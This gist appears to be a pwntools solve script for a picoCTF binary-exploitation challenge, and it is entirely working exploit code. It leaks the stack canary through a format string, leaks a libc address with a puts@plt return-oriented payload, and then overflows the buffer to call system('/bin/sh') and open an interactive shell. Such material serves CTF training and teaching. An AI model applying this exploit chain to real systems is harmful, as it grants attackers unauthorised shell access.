@captain-woof
Created January 22, 2021 10:43
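#!/usr/bin/python3
"""Solve script for the picoCTF "vuln" service at jupiter.challenges.picoctf.org:13610.

The script is a single flat sequence of send/receive steps against the remote
service, in four stages:

  1. answer the guessing game with the value the service reports as correct;
  2. read the stack canary back through the "Name? " prompt with a format string;
  3. overflow the name buffer to call puts(puts@got) and learn the libc load address;
  4. overflow again to call system("/bin/sh") using the libc offsets recorded below.

Stage-specific constants (the "%135$p" index, the 512/12-byte frame padding and
the libc offsets) were determined for this particular binary and libc; none of
them is derived at run time.
"""
import sys

from pwn import *

# Prologue: silence pwntools while the ELF is parsed, then restore info-level logging.
context.log_level = 'error'
elf = ELF('./vuln')
context.log_level = 'info'

host, port = "jupiter.challenges.picoctf.org", 13610
proc = remote(host, port)
# Local debugging alternative (same protocol, local binary under gdb):
# proc = gdb.debug("./vuln", gdbscript="""
# continue
# """)

# Sent as text; the service answers "Congrats" to this value.
guess = str(-31)

# --- Stage 1: win the guessing game -------------------------------------------
proc.recvlines(4)  # banner/prompt lines printed before the first guess is read
g = log.progress("Guessing")
g.status(guess)
proc.sendline(guess)
resp = proc.recvline().decode().strip()
proc.recvline()  # discard the line that follows the verdict
if "Congrats" in resp:
    g.success("Guessed correctly!")
else:
    # The remaining protocol depends on a correct guess, so stop here and
    # report failure through the exit status rather than exiting with 0.
    g.failure("Wrong guess")
    sys.exit(1)

# --- Stage 2: leak the stack canary -------------------------------------------
# The name entered at "Name? " is presumably used as a printf format string:
# "%135$p" prints the 135th stack word of that frame, which for this binary is
# the canary; it comes back as a hex value after "Congrats: ".
c = log.progress("Stack cookie")
c.status("Leaking...")
proc.recvuntil("Name? ")
proc.sendline("%135$p")
proc.recvuntil("Congrats: ")
canary = int(proc.recvline().decode().strip(), 16)
proc.recvline()
c.success(hex(canary))

# --- Stage 3: leak the libc address of puts() ---------------------------------
pu = log.progress("puts() address in libc")
pu.status("Leaking...")
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
proc.recvline()
proc.sendline(guess)  # play another round to reach the name prompt again
proc.recvuntil("Name? ")
# Frame layout assumed by the overflow: 512 bytes of buffer, the canary, then 12
# bytes up to the saved return address. Return into puts@plt with win() as its
# return address and puts@got as its argument, so the service prints the
# resolved puts pointer and then continues in win().
payload = (
    b"A" * 512
    + p32(canary)
    + b"A" * 12
    + p32(puts_plt)
    + p32(elf.functions['win'].address)
    + p32(puts_got)
)
proc.sendline(payload)
proc.recvlines(2)
puts_addr = u32(proc.recv(4))  # first four bytes puts() writes are the pointer
pu.success(hex(puts_addr))

# --- Stage 4: call system("/bin/sh") ------------------------------------------
# Offsets relative to puts() in the remote libc; they are specific to that
# build and must be recomputed for any other libc.
binsh_offset = 0x1147bf
system_offset = -0x2a650
shell = log.progress("Popping shell")
shell.status("Sending payload")
binsh_addr = puts_addr + binsh_offset
system_addr = puts_addr + system_offset
proc.recvuntil("Name? ")
# Same frame layout as stage 3, now returning into system() with "/bin/sh" as
# its argument and win() as the return address.
payload = (
    b"A" * 512
    + p32(canary)
    + b"A" * 12
    + p32(system_addr)
    + p32(elf.functions['win'].address)
    + p32(binsh_addr)
)
proc.sendline(payload)
shell.success("Sent payload")
proc.recvlines(2)
proc.interactive()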